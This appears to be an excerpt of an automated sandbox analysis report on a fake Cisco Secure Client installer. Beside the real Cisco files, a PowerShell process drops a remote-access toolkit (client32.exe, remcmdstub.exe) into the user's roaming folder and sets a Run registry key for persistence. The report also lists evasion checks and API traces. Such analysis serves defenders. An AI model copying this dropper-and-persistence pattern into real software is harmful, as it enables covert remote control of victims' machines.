                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-KVJK8.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\is-HMVS5.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-QS498.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-C05BP.tmp
                                  Source: C:\Windows\SysWOW64\wget.exe File created: C:\Users\user\Desktop\download\CiscoSetup.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KNT8U.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OFTU2.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-SHB4H.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T5R7J.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1IOCC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FBE8U.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-GT7EB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-QHSOL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-FVJ6D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LQ9L3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5841.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-6U0C3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2OKLO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FJD72.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UHIQE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q5QKO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-DLGKK.tmpJump to dropped file
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E1C9T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2UOIT.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D3PAV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8FFCG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8SET5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LRKED.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D1NAI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EKIDE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AQJIS.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KL0N9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-J44M9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689C7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,11_2_689C7030
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CiscoJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco\Cisco Secure Client for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110F600 IsIconic,GetTickCount,11_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_111579D0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11023FB0 IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,12_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,12_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,12_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1110F600 IsIconic,GetTickCount,12_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_111579D0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,12_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,12_2_1111F870
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,12_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,12_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11023FB0 IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,12_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,12_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,12_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029230
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11069C00
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_689B91F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_11069C00
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle, 11_2_11127110
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle, 12_2_11127110
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9922
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Window / User API: threadDelayed 387
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Window / User API: threadDelayed 7650
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EKIDE.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AQJIS.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KL0N9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-J44M9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-84570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-85055
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-87699
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-87913
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-88071
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-84681
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI coverage: 5.8 %
